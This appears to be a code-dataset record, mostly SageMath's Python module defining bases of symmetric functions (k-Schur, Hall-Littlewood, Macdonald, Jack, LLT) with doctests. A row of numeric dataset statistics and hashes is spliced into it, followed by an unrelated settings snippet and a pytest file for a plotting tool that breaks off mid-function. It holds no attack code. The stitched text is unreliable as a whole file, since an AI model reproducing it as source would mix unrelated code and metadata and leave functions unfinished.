The `k`-Schur functions are more generally defined with a parameter `t` and they are
a basis of the subspace spanned by the Hall-Littlewood ``Qp`` symmetric functions
indexed by partitions whose first part is less than or equal to `k`::
sage: Sym = SymmetricFunctions(QQ['t'].fraction_field())
sage: SymS3 = Sym.kBoundedSubspace(3) # default t='t'
sage: ks = SymS3.kschur()
sage: Qp = Sym.hall_littlewood().Qp()
sage: ks(Qp[2,1,1,1])
ks3[2, 1, 1, 1] + (t^2+t)*ks3[2, 2, 1] + (t^3+t^2)*ks3[3, 1, 1] + t^4*ks3[3, 2]
The subspace spanned by the `k`-Schur functions with a parameter `t` are not known
to form a natural algebra. However it is known that the product of a `k`-Schur
function and an `\ell`-Schur function is in the linear span of the `k+\ell`-Schur
functions::
sage: ks(ks[2,1]*ks[1,1])
Traceback (most recent call last):
...
ValueError: s[2, 1, 1, 1] + s[2, 2, 1] + s[3, 1, 1] + s[3, 2] is not in the image
sage: ks[2,1]*ks[1,1]
s[2, 1, 1, 1] + s[2, 2, 1] + s[3, 1, 1] + s[3, 2]
sage: ks6 = Sym.kBoundedSubspace(6).kschur()
sage: ks6(ks[3,1,1]*ks[3])
ks6[3, 3, 1, 1] + ks6[4, 2, 1, 1] + (t+1)*ks6[4, 3, 1] + t*ks6[4, 4]
+ ks6[5, 1, 1, 1] + ks6[5, 2, 1] + t*ks6[5, 3] + ks6[6, 1, 1]
.. rubric:: dual `k`-Schur functions
The dual space to the subspace spanned by the `k`-Schur functions is most naturally
realized as a quotient of the ring of symmetric functions by an ideal. When `t=1`
the ideal is generated by the monomial symmetric functions indexed by partitions
whose first part is greater than `k`.::
sage: Sym = SymmetricFunctions(QQ)
sage: SymQ3 = Sym.kBoundedQuotient(3,t=1)
sage: km = SymQ3.kmonomial()
sage: km[2,1]*km[2,1]
4*m3[2, 2, 1, 1] + 6*m3[2, 2, 2] + 2*m3[3, 2, 1] + 2*m3[3, 3]
sage: F = SymQ3.affineSchur()
sage: F[2,1]*F[2,1]
2*F3[1, 1, 1, 1, 1, 1] + 4*F3[2, 1, 1, 1, 1] + 4*F3[2, 2, 1, 1] + 4*F3[2, 2, 2]
+ 2*F3[3, 1, 1, 1] + 4*F3[3, 2, 1] + 2*F3[3, 3]
When `t` is not equal to `1`, the subspace spanned by the `k`-Schur functions is
realized as a quotient of the ring of symmetric functions by the ideal generated by
the Hall-Littlewood symmetric functions in the P basis indexed by partitions with
first part greater than `k`.::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: SymQ3 = Sym.kBoundedQuotient(3)
sage: kHLP = SymQ3.kHallLittlewoodP()
sage: kHLP[2,1]*kHLP[2,1]
(t^2+2*t+1)*HLP3[2, 2, 1, 1] + (t^3+2*t^2+2*t+1)*HLP3[2, 2, 2]
+ (-t^4-t^3+t+1)*HLP3[3, 1, 1, 1] + (-t^2+t+2)*HLP3[3, 2, 1] + (t+1)*HLP3[3, 3]
sage: HLP = Sym.hall_littlewood().P()
sage: kHLP(HLP[3,1])
HLP3[3, 1]
sage: kHLP(HLP[4])
0
In this space, the basis which is dual to the `k`-Schur functions conjecturally
expands positively in the `k`-bounded Hall-Littlewood functions and has positive
structure coefficients.::
sage: dks = SymQ3.dual_k_Schur()
sage: kHLP(dks[2,2])
(t^4+t^2)*HLP3[1, 1, 1, 1] + t*HLP3[2, 1, 1] + HLP3[2, 2]
sage: dks[2,1]*dks[1,1]
(t^2+t)*dks3[1, 1, 1, 1, 1] + (t+1)*dks3[2, 1, 1, 1] + (t+1)*dks3[2, 2, 1]
+ dks3[3, 1, 1] + dks3[3, 2]
At `t=1` the `k`-bounded Hall-Littlewood basis is equal to the `k`-bounded monomial
basis and the dual `k`-Schur elements are equal to the affine Schur basis. The
`k`-bounded monomial basis and affine Schur functions are faster and should be used
instead of the `k`-bounded Hall-Littlewood P basis and dual `k`-Schur functions when
`t=1`.::
sage: SymQ3 = Sym.kBoundedQuotient(3,t=1)
sage: dks = SymQ3.dual_k_Schur()
sage: F = SymQ3.affineSchur()
sage: F[3,1]==dks[3,1]
True
.. rubric:: Implementing new bases
.. todo:: to be described
.. rubric:: Acknowledgements
The design is heavily inspired from the implementation of
symmetric functions in MuPAD-Combinat (see [HT04]_ and [FD06]_).
REFERENCES:
.. [FD06] Francois Descouens, Making research on symmetric functions using MuPAD-Combinat.
In Andres Iglesias and Nobuki Takayama, editors, 2nd International Congress on Mathematical Software (ICMS'06),
volume 4151 of LNCS, pages 407-418, Castro Urdiales, Spain, September 2006. Springer-Verlag.
:arXiv:`0806.1873`
.. [HT04] Florent Hivert and Nicolas M. Thiery,
MuPAD-Combinat, an open-source package for research in algebraic combinatorics.
Sem. Lothar. Combin., 51 :Art. B51z, 70 pp. (electronic), 2004.
http://mupad-combinat.sf.net/.
.. [MAC] Ian Macdonald, Symmetric Functions and Orthogonal Polynomials,
Second edition. With contributions by A. Zelevinsky. Oxford Mathematical Monographs.
Oxford Science Publications. The Clarendon Press, Oxford University Press, New York, 1995. x+475 pp.
ISBN: 0-19-853489-2
.. [STA] Richard Stanley, Enumerative combinatorics. Vol. 2.
With a foreword by Gian-Carlo Rota and appendix 1 by Sergey Fomin.
Cambridge Studies in Advanced Mathematics, 62. Cambridge University Press, Cambridge, 1999. xii+581 pp.
ISBN: 0-521-56069-1; 0-521-78987-7
.. [ST94] Scharf, Thomas, Thibon, Jean-Yves,
A Hopf-algebra approach to inner plethysm.
Adv. Math. 104 (1994), no. 1, 30-58.
:doi:`10.1006/aima.1994.1019`
.. rubric:: Further tests
TESTS::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym
Symmetric Functions over Rational Field
sage: h = Sym.h(); e = Sym.e(); s = Sym.s(); m = Sym.m(); p = Sym.p()
sage: ( ( h[2,1] * ( 1 + 3 * h[2,1]) ) + s[2]. antipode()) . coproduct()
h[] # h[1, 1] - h[] # h[2] + h[] # h[2, 1] + 3*h[] # h[2, 2, 1, 1] + h[1] # h[1] + h[1] # h[1, 1]
+ h[1] # h[2] + 6*h[1] # h[2, 1, 1, 1] + 6*h[1] # h[2, 2, 1] + h[1, 1] # h[] + h[1, 1] # h[1]
+ 3*h[1, 1] # h[1, 1, 1, 1] + 12*h[1, 1] # h[2, 1, 1] + 3*h[1, 1] # h[2, 2] + 6*h[1, 1, 1] # h[1, 1, 1]
+ 6*h[1, 1, 1] # h[2, 1] + 3*h[1, 1, 1, 1] # h[1, 1] - h[2] # h[] + h[2] # h[1] + 6*h[2] # h[2, 1, 1]
+ h[2, 1] # h[] + 6*h[2, 1] # h[1, 1, 1] + 12*h[2, 1] # h[2, 1] + 12*h[2, 1, 1] # h[1, 1]
+ 6*h[2, 1, 1] # h[2] + 6*h[2, 1, 1, 1] # h[1] + 3*h[2, 2] # h[1, 1] + 6*h[2, 2, 1] # h[1] + 3*h[2, 2, 1, 1] # h[]
.. TODO::
- Introduce fields with degree 1 elements as in
MuPAD-Combinat, to get proper plethysm.
- Use UniqueRepresentation to get rid of all the manual cache
handling for the bases
- Devise a mechanism so that pickling bases of symmetric
functions pickles the coercions which have a cache.
"""
def __init__(self, R):
r"""
Initialization of ``self``.
INPUT:
- ``R`` -- a ring
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
TESTS::
sage: TestSuite(Sym).run()
"""
assert(R in Rings())
self._base = R # Won't be needed when CategoryObject won't override anymore base_ring
Parent.__init__(self, category = GradedHopfAlgebras(R).WithRealizations())
def a_realization(self):
r"""
Returns a particular realization of ``self`` (the Schur basis).
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym.a_realization()
Symmetric Functions over Rational Field in the Schur basis
"""
return self.schur()
def _repr_(self): # could be taken care of by the category
r"""
Representation of ``self``
TESTS::
sage: SymmetricFunctions(RR) # indirect doctest
Symmetric Functions over Real Field with 53 bits of precision
"""
return "Symmetric Functions over %s"%self.base_ring()
def schur(self):
r"""
The Schur basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).schur()
Symmetric Functions over Rational Field in the Schur basis
"""
return schur.SymmetricFunctionAlgebra_schur(self)
s = schur
Schur = schur # Currently needed by SymmetricFunctions.__init_extra__
# and sfa.SymmetricFunctionsBases.corresponding_basis_over
def powersum(self):
r"""
The power sum basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).powersum()
Symmetric Functions over Rational Field in the powersum basis
"""
return powersum.SymmetricFunctionAlgebra_power(self)
p = powersum
power = powersum # Todo: get rid of this one when it won't be needed anymore
def complete(self):
r"""
The complete basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).complete()
Symmetric Functions over Rational Field in the homogeneous basis
"""
return homogeneous.SymmetricFunctionAlgebra_homogeneous(self)
h = complete
homogeneous = complete
def elementary(self):
r"""
The elementary basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).elementary()
Symmetric Functions over Rational Field in the elementary basis
"""
return elementary.SymmetricFunctionAlgebra_elementary(self)
e = elementary
def monomial(self):
r"""
The monomial basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).monomial()
Symmetric Functions over Rational Field in the monomial basis
"""
return monomial.SymmetricFunctionAlgebra_monomial(self)
m = monomial
def witt(self, coerce_h=True, coerce_e=False, coerce_p=False):
r"""
The Witt basis of the symmetric functions.
EXAMPLES::
sage: SymmetricFunctions(QQ).witt()
Symmetric Functions over Rational Field in the Witt basis
sage: SymmetricFunctions(QQ).witt(coerce_p=True)
Symmetric Functions over Rational Field in the Witt basis
sage: SymmetricFunctions(QQ).witt(coerce_h=False, coerce_e=True, coerce_p=True)
Symmetric Functions over Rational Field in the Witt basis
"""
import witt
return witt.SymmetricFunctionAlgebra_witt(self, coerce_h=coerce_h, coerce_e=coerce_e, coerce_p=coerce_p)
w = witt
# Currently needed by sfa.SymmetricFunctionsBases.corresponding_basis_over
Witt = witt
def forgotten(self):
r"""
The forgotten basis of the Symmetric Functions (or the basis dual to
the elementary basis with respect to the Hall scalar product).
EXAMPLES::
sage: SymmetricFunctions(QQ).forgotten()
Symmetric Functions over Rational Field in the forgotten basis
TESTS:
Over the rationals::
sage: Sym = SymmetricFunctions(QQ)
sage: e = Sym.e()
sage: f = Sym.f()
sage: h = Sym.h()
sage: p = Sym.p()
sage: s = Sym.s()
sage: m = Sym.m()
sage: e(f([2,1]))
-2*e[1, 1, 1] + 5*e[2, 1] - 3*e[3]
sage: f(e([2,1]))
3*f[1, 1, 1] + 2*f[2, 1] + f[3]
sage: h(f([2,1]))
h[2, 1] - 3*h[3]
sage: f(h([2,1]))
3*f[1, 1, 1] + f[2, 1]
sage: p(f([2,1]))
-p[2, 1] - p[3]
sage: f(p([2,1]))
-f[2, 1] - f[3]
sage: s(f([2,1]))
s[2, 1] - 2*s[3]
sage: f(s([2,1]))
2*f[1, 1, 1] + f[2, 1]
sage: m(f([2,1]))
-m[2, 1] - 2*m[3]
sage: f(m([2,1]))
-f[2, 1] - 2*f[3]
Over the integers::
sage: Sym = SymmetricFunctions(ZZ)
sage: e = Sym.e()
sage: f = Sym.f()
sage: h = Sym.h()
sage: p = Sym.p()
sage: s = Sym.s()
sage: m = Sym.m()
sage: e(f([2,1]))
-2*e[1, 1, 1] + 5*e[2, 1] - 3*e[3]
sage: f(e([2,1]))
3*f[1, 1, 1] + 2*f[2, 1] + f[3]
sage: h(f([2,1]))
h[2, 1] - 3*h[3]
sage: f(h([2,1]))
3*f[1, 1, 1] + f[2, 1]
sage: f(p([2,1]))
-f[2, 1] - f[3]
sage: s(f([2,1]))
s[2, 1] - 2*s[3]
sage: f(s([2,1]))
2*f[1, 1, 1] + f[2, 1]
sage: m(f([2,1]))
-m[2, 1] - 2*m[3]
sage: f(m([2,1]))
-f[2, 1] - 2*f[3]
Conversion from the forgotten basis to the power-sum basis over the
integers is not well-defined in general, even if the result happens
to have integral coefficients::
sage: p(f([2,1]))
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Fun exercise: prove that `p(f_{\lambda})` and `p(m_{\lambda})` have
integral coefficients whenever `\lambda` is a strict partition.
"""
return self.elementary().dual_basis()
f = forgotten
def macdonald(self, q='q', t='t'):
r"""
Returns the entry point for the various Macdonald bases.
INPUT:
- ``q``, ``t`` -- parameters
Macdonald symmetric functions including bases `P`, `Q`, `J`, `H`, `Ht`.
This also contains the `S` basis which is dual to the Schur basis with
respect to the `q,t` scalar product.
The parameters `q` and `t` must be in the base_ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['q','t']))
sage: P = Sym.macdonald().P(); P
Symmetric Functions over Fraction Field of Multivariate Polynomial Ring in q, t over Rational Field in the Macdonald P basis
sage: P[2]
McdP[2]
sage: Q = Sym.macdonald().Q(); Q
Symmetric Functions over Fraction Field of Multivariate Polynomial Ring in q, t over Rational Field in the Macdonald Q basis
sage: S = Sym.macdonald().S()
sage: s = Sym.schur()
sage: matrix([[S(la).scalar_qt(s(mu)) for la in Partitions(3)] for mu in Partitions(3)])
[1 0 0]
[0 1 0]
[0 0 1]
sage: H = Sym.macdonald().H()
sage: s(H[2,2])
q^2*s[1, 1, 1, 1] + (q^2*t+q*t+q)*s[2, 1, 1] + (q^2*t^2+1)*s[2, 2] + (q*t^2+q*t+t)*s[3, 1] + t^2*s[4]
sage: Sym = SymmetricFunctions(QQ['z','q'].fraction_field())
sage: (z,q) = Sym.base_ring().gens()
sage: Hzq = Sym.macdonald(q=z,t=q).H()
sage: H1z = Sym.macdonald(q=1,t=z).H()
sage: s = Sym.schur()
sage: s(H1z([2,2]))
s[1, 1, 1, 1] + (2*z+1)*s[2, 1, 1] + (z^2+1)*s[2, 2] + (z^2+2*z)*s[3, 1] + z^2*s[4]
sage: s(Hzq[2,2])
z^2*s[1, 1, 1, 1] + (z^2*q+z*q+z)*s[2, 1, 1] + (z^2*q^2+1)*s[2, 2] + (z*q^2+z*q+q)*s[3, 1] + q^2*s[4]
sage: s(H1z(Hzq[2,2]))
z^2*s[1, 1, 1, 1] + (z^2*q+z*q+z)*s[2, 1, 1] + (z^2*q^2+1)*s[2, 2] + (z*q^2+z*q+q)*s[3, 1] + q^2*s[4]
"""
return macdonald.Macdonald(self, q=q, t=t)
def hall_littlewood(self, t='t'):
"""
Returns the entry point for the various Hall-Littlewood bases.
INPUT:
- ``t`` -- parameter
Hall-Littlewood symmetric functions including bases `P`, `Q`, `Qp`.
The Hall-Littlewood `P` and `Q` functions at `t=-1` are the
Schur-P and Schur-Q functions when indexed by strict partitions.
The parameter `t` must be in the base ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: P = Sym.hall_littlewood().P(); P
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood P basis
sage: P[2]
HLP[2]
sage: Q = Sym.hall_littlewood().Q(); Q
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood Q basis
sage: Q[2]
HLQ[2]
sage: Qp = Sym.hall_littlewood().Qp(); Qp
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood Qp basis
sage: Qp[2]
HLQp[2]
"""
return hall_littlewood.HallLittlewood(self, t=t)
def jack(self, t='t'):
"""
Returns the entry point for the various Jack bases.
INPUT:
- ``t`` -- parameter
Jack symmetric functions including bases `P`, `Q`, `Qp`.
The parameter `t` must be in the base ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: JP = Sym.jack().P(); JP
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack P basis
sage: JQ = Sym.jack().Q(); JQ
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack Q basis
sage: JJ = Sym.jack().J(); JJ
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack J basis
sage: JQp = Sym.jack().Qp(); JQp
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack Qp basis
"""
return jack.Jack( self, t=t )
def zonal(self):
"""
The zonal basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).zonal()
Symmetric Functions over Rational Field in the zonal basis
"""
return jack.SymmetricFunctionAlgebra_zonal( self )
def llt(self, k, t='t'):
"""
The LLT symmetric functions.
INPUT:
- ``k`` -- a positive integer indicating the level
- ``t`` -- a parameter (default: `t`)
LLT polynomials in `hspin` and `hcospin` bases.
EXAMPLES::
sage: llt3 = SymmetricFunctions(QQ['t'].fraction_field()).llt(3); llt3
level 3 LLT polynomials over Fraction Field of Univariate Polynomial Ring in t over Rational Field
sage: llt3.hspin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT spin basis
sage: llt3.hcospin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT cospin basis
sage: llt3.hcospin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT cospin basis
"""
return llt.LLT_class( self, k, t=t )
def from_polynomial(self, f):
"""
Converts a symmetric polynomial ``f`` to a symmetric function.
INPUT:
- ``f`` -- a symmetric polynomial
This function converts a symmetric polynomial `f` in a polynomial ring in finitely
many variables to a symmetric function in the monomial
basis of the ring of symmetric functions over the same base ring.
EXAMPLES::
sage: P = PolynomialRing(QQ, 'x', 3)
sage: x = P.gens()
sage: f = x[0] + x[1] + x[2]
sage: S = SymmetricFunctions(QQ)
sage: S.from_polynomial(f)
m[1]
sage: f = x[0] + 2*x[1] + x[2]
sage: S.from_polynomial(f)
Traceback (most recent call last):
...
ValueError: x0 + 2*x1 + x2 is not a symmetric polynomial
"""
return self.m().from_polynomial(f)
def register_isomorphism(self, morphism, only_conversion=False):
"""
Register an isomorphism between two bases of ``self``, as a canonical coercion
(unless the optional keyword ``only_conversion`` is set to ``True``,
in which case the isomorphism is registered as conversion only).
EXAMPLES:
We override the canonical coercion from the Schur basis to the
powersum basis by a (stupid!) map `s_\lambda\mapsto 2p_\lambda`.
::
sage: Sym = SymmetricFunctions(QQ['zorglub']) # make sure we are not going to screw up later tests
sage: s = Sym.s(); p = Sym.p().dual_basis()
sage: phi = s.module_morphism(diagonal = lambda t: 2, codomain = p)
sage: phi(s[2, 1])
2*d_p[2, 1]
sage: Sym.register_isomorphism(phi)
sage: p(s[2,1])
2*d_p[2, 1]
The map is supposed to implement the canonical isomorphism
between the two bases. Otherwise, the results will be
mathematically wrong, as above. Use with care!
"""
if only_conversion:
morphism.codomain().register_conversion(morphism)
else:
morphism.codomain().register_coercion(morphism)
_shorthands = set(['e', 'h', 'm', 'p', 's'])
def inject_shorthands(self, shorthands = _shorthands):
"""
Imports standard shorthands into the global namespace
INPUT:
- ``shorthands`` -- a list (or iterable) of strings (default: ['e', 'h', 'm', 'p', 's'])
EXAMPLES::
sage: S = SymmetricFunctions(ZZ)
sage: S.inject_shorthands()
sage: s[1] + e[2] * p[1,1] + 2*h[3] + m[2,1]
s[1] - 2*s[1, 1, 1] + s[1, 1, 1, 1] + s[2, 1] + 2*s[2, 1, 1] + s[2, 2] + 2*s[3] + s[3, 1]
sage: e
Symmetric Functions over Integer Ring in the elementary basis
sage: p
Symmetric Functions over Integer Ring in the powersum basis
sage: s
Symmetric Functions over Integer Ring in the Schur basis
sage: e == S.e(), h == S.h(), m == S.m(), p == S.p(), s == S.s()
(True, True, True, True, True)
One can also just import a subset of the shorthands::
sage: S = SymmetricFunctions(QQ)
sage: S.inject_shorthands(['p', 's'])
sage: p
Symmetric Functions over Rational Field in the powersum basis
sage: s
Symmetric Functions over Rational Field in the Schur basis
Note that ``e`` is left unchanged::
sage: e
Symmetric Functions over Integer Ring in the elementary basis
"""
from sage.misc.misc import inject_variable
for shorthand in shorthands:
assert shorthand in self._shorthands
inject_variable(shorthand, getattr(self, shorthand)())
def __init_extra__(self):
"""
Sets up the coercions between the different bases
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ) # indirect doctest
sage: s = Sym.s(); p = Sym.p()
sage: f = s.coerce_map_from(p); f
Generic morphism:
From: Symmetric Functions over Rational Field in the powersum basis
To: Symmetric Functions over Rational Field in the Schur basis
sage: p.an_element()
2*p[] + 2*p[1] + 3*p[2]
sage: f(p.an_element())
2*s[] + 2*s[1] - 3*s[1, 1] + 3*s[2]
sage: f(p.an_element()) == p.an_element()
True
"""
#powersum = self.powersum ()
#complete = self.complete ()
#elementary = self.elementary()
#schur = self.schur ()
#monomial = self.monomial ()
iso = self.register_isomorphism
from sage.combinat.sf.classical import conversion_functions
for (basis1_name, basis2_name) in conversion_functions.keys():
basis1 = getattr(self, basis1_name)()
basis2 = getattr(self, basis2_name)()
on_basis = SymmetricaConversionOnBasis(t = conversion_functions[basis1_name,basis2_name], domain = basis1, codomain = basis2)
from sage.rings.rational_field import RationalField
if basis2_name != "powersum" or self._base.has_coerce_map_from(RationalField()):
iso(basis1._module_morphism(on_basis, codomain = basis2))
else:
# Don't register conversions to powersums as coercions,
# unless the base ring is a `\QQ`-algebra
# (otherwise the coercion graph loses commutativity).
iso(basis1._module_morphism(on_basis, codomain = basis2), only_conversion = True)
# Todo: fill in with other conversion functions on the classical bases
def kBoundedSubspace(self, k, t='t'):
r"""
Return the `k`-bounded subspace of the ring of symmetric functions.
INPUT:
- ``k`` - a positive integer
- ``t`` a formal parameter; `t=1` yields a subring
The subspace of the ring of symmetric functions spanned by
`\{ s_{\lambda}[X/(1-t)] \}_{\lambda_1\le k} = \{ s_{\lambda}^{(k)}[X,t]\}_{\lambda_1 \le k}`
over the base ring `\mathbb{Q}[t]`. When `t=1`, this space is in fact a subalgebra of
the ring of symmetric functions generated by the complete homogeneous symmetric functions
`h_i` for `1\le i \le k`.
.. seealso:: :meth:`sage.combinat.sf.new_kschur.KBoundedSubspace`
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: KB = Sym.kBoundedSubspace(3,1); KB
3-bounded Symmetric Functions over Rational Field with t=1
sage: Sym = SymmetricFunctions(QQ['t'])
sage: Sym.kBoundedSubspace(3)
3-bounded Symmetric Functions over Univariate Polynomial Ring in t over Rational Field
sage: Sym = SymmetricFunctions(QQ['z'])
sage: z = Sym.base_ring().gens()[0]
sage: Sym.kBoundedSubspace(3,t=z)
3-bounded Symmetric Functions over Univariate Polynomial Ring in z over Rational Field with t=z
"""
from sage.combinat.sf.new_kschur import KBoundedSubspace
return KBoundedSubspace(self, k, t=t)
def kschur(self, k, t ='t'):
r"""
Returns the `k`-Schur functions.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: ks = Sym.kschur(3,1)
sage: ks[2]*ks[2]
ks3[2, 2] + ks3[3, 1]
sage: ks[2,1,1].lift()
s[2, 1, 1] + s[3, 1]
sage: Sym = SymmetricFunctions(QQ['t'])
sage: ks = Sym.kschur(3)
sage: ks[2,2,1].lift()
s[2, 2, 1] + t*s[3, 2]
"""
return self.kBoundedSubspace(k, t=t).kschur()
def khomogeneous(self, k):
r"""
Returns the homogeneous symmetric functions in the `k`-bounded subspace.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: kh = Sym.khomogeneous(4)
sage: kh[3]*kh[4]
h4[4, 3]
sage: kh[4].lift()
h[4]
"""
return self.kBoundedSubspace(k, t=1).khomogeneous()
def kBoundedQuotient(self, k, t='t'):
r"""
Returns the `k`-bounded quotient space of the ring of symmetric functions.
INPUT:
- ``k`` - a positive integer
The quotient of the ring of symmetric functions ...
.. seealso:: :meth:`sage.combinat.sf.k_dual.KBoundedQuotient`
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: KQ = Sym.kBoundedQuotient(3); KQ
Traceback (most recent call last):
...
TypeError: unable to convert t to a rational
sage: KQ = Sym.kBoundedQuotient(3,t=1); KQ
3-Bounded Quotient of Symmetric Functions over Rational Field with t=1
sage: Sym = SymmetricFunctions(QQ['t'].fraction_field())
sage: KQ = Sym.kBoundedQuotient(3); KQ
3-Bounded Quotient of Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field
"""
from sage.combinat.sf.k_dual import KBoundedQuotient
return KBoundedQuotient(self, k, t)
class SymmetricaConversionOnBasis:
def __init__(self, t, domain, codomain):
"""
Initialization of ``self``.
INPUT:
- ``t`` -- a function taking a monomial in CombinatorialFreeModule(QQ, Partitions()),
and returning a (partition, coefficient) list.
- ``domain``, ``codomain`` -- parents
Construct a function mapping a partition to an element of ``codomain``.
This is a temporary quick hack to wrap around the existing
symmetrica conversions, without changing their specs.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ[x])
sage: p = Sym.p(); s = Sym.s()
sage: def t(x) : [(p,c)] = x; return [ (p,2*c), (p.conjugate(), c) ]
sage: f = sage.combinat.sf.sf.SymmetricaConversionOnBasis(t, p, s)
sage: f(Partition([3,1]))
s[2, 1, 1] + 2*s[3, 1]
"""
self._domain = domain
self.fake_sym = CombinatorialFreeModule(QQ, Partitions())
self._codomain = codomain
self._t = t
def __call__(self, partition):
"""
sage: Sym = SymmetricFunctions(QQ[x])
sage: p = Sym.p(); s = Sym.s()
sage: p[1] + s[1] # indirect doctest
2*p[1]
"""
# TODO: use self._codomain.sum_of_monomials, when the later
# will have an optional optimization for the case when there
# is no repetition in the support
return self._codomain._from_dict(dict(self._t(self.fake_sym.monomial(partition))), coerce = True)
| 37.329726 | 140 | 0.585477 | 7,531 | 51,739 | 3.991369 | 0.120037 | 0.015969 | 0.01018 | 0.005456 | 0.360924 | 0.282411 | 0.229682 | 0.193187 | 0.172228 | 0.135034 | 0 | 0.040748 | 0.294671 | 51,739 | 1,385 | 141 | 37.356679 | 0.782945 | 0.802683 | 0 | 0.016807 | 0 | 0 | 0.009883 | 0 | 0 | 0 | 0 | 0.004332 | 0.016807 | 1 | 0.210084 | false | 0 | 0.176471 | 0 | 0.672269 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8675c8c5e86ac10bb03d23826def9bd5917b7d31 | 91 | py | Python | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 5 | 2019-09-02T12:15:17.000Z | 2020-03-07T12:54:36.000Z | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 19 | 2019-08-12T12:00:13.000Z | 2019-11-11T14:14:38.000Z | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 3 | 2019-10-24T16:45:27.000Z | 2020-03-05T09:48:45.000Z | LUCYFER_SETTINGS = {
"SAVED_SEARCHES_ENABLE": False,
"SAVED_SEARCHES_KEY": None,
}
| 18.2 | 35 | 0.703297 | 10 | 91 | 5.9 | 0.8 | 0.440678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175824 | 91 | 4 | 36 | 22.75 | 0.786667 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
869a10978a36aa0ec09fb0893830708008c7185c | 2,126 | py | Python | tests/test_cli_spec.py | rai-project/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | null | null | null | tests/test_cli_spec.py | rai-project/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | 8 | 2018-08-13T20:27:48.000Z | 2018-08-30T11:40:32.000Z | tests/test_cli_spec.py | c3sr/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from scope_plot import cli
pytest_plugins = ["pytester"]
FIXTURES_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "__fixtures")
@pytest.fixture
def run(testdir):
def do_run(*args):
args = ["scope_plot", "--debug"] + list(args)
return testdir._run(*args)
return do_run
@pytest.fixture
def run_spec(testdir):
def do_run(spec_file):
spec_path = os.path.join(FIXTURES_DIR, spec_file)
output_path = os.path.join(FIXTURES_DIR, "test.pdf")
args = [
"scope_plot", "--debug", "--include", FIXTURES_DIR, "spec",
"--output", output_path, spec_path
]
return testdir._run(*args)
return do_run
@pytest.fixture
def run_spec_no_output(testdir):
def do_run(spec_file):
spec_path = os.path.join(FIXTURES_DIR, spec_file)
args = [
"scope_plot", "--debug", "--include", FIXTURES_DIR, "spec", spec_path
]
return testdir._run(*args)
return do_run
def test_spec_missing(tmpdir, run_spec):
result = run_spec("matplotlib_bar_missing.yml")
assert result.ret == 0
def test_bokeh_bar(tmpdir, run_spec):
result = run_spec("bokeh_bar.yml")
assert result.ret == 0
def test_bokeh_errorbar(tmpdir, run_spec):
result = run_spec("bokeh_errorbar.yml")
assert result.ret == 0
def test_bokeh_subplots(tmpdir, run_spec):
result = run_spec("bokeh_subplots.yml")
assert result.ret == 0
def test_matplotlib_bar(tmpdir, run_spec):
result = run_spec("matplotlib_bar.yml")
assert result.ret == 0
def test_matplotlib_errorbar(tmpdir, run_spec):
